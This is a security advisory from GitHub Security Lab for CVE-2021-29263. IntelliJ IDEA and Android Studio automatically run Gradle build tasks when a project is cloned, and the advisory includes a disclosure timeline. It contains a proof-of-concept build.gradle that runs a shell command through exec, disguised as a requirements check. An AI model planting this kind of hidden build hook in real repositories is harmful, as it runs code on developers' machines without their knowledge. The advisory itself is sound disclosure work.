GHSL-2020-337_338: Arbitrary code execution when cloning/checking out a Gradle project - CVE-2021-29263

Coordinated Disclosure Timeline

• 2020-12-17: Reported to security@jetbrains.com
• 2020-12-18: The issue will be investigated by JetBrains team
• 2021-02-02: JetBrains states that they have found an appropriate solution and have started implementing it.
• 2021-03-25: Requested status update from JetBrains.
• 2021-03-25: A fix was implemented in IntelliJ IDEA 2020.3.3, released on March 16, 2021

Summary

Upon cloning or checking out a Gradle project from an external repository (Get from VCS), both IntelliJ IDEA and Android Studio, run the gradle build task.

Products

• IntelliJ IDEA
• Android Studio

Tested Version

• IntelliJ IDEA 2020.3 (Community Edition)

Build #IC-203.5981.155, built on November 30, 2020

• Android Studio 4.1.1

Build #AI-201.8743.12.41.6953283, built on November 5, 2020

Details

Issue: Code execution when cloning/checking out a repository

When cloning or checking out a repository containing a Gradle project, Android Studio and IntelliJ will try to run the build task immediately without asking for a user confirmation that would give them the opportunity to analyze the build script.

If an attacker fools a developer into cloning or checking out a malicious repository, they will be able to run arbitrary code as part of the repository clone or checkout operation. For example, an attacker could hide a malware dropper using the Gradle’s Exec or try something more stealthy.

apply plugin: 'java'

sourceCompatibility = 1.8
targetCompatibility = 1.8

void checkRequirements(){
    exec {
      executable 'touch'
      args '/tmp/pwned_from_gradle'
    }

}

build{
    checkRequirements();
}

When searching for similar patterns I found the exact same issue being discussed as a malware spread vector which highlights why this issue should be addressed. In addition a similar vulnerability (CVE-2020-17156) was recently fixed in MS Visual Studio.

Impact

Arbitrary Code Execution on repository cloning/checkout.

CVE

• CVE-2021-29263

Resources

https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-337, GHSL-2020-338 in any communication regarding this issue.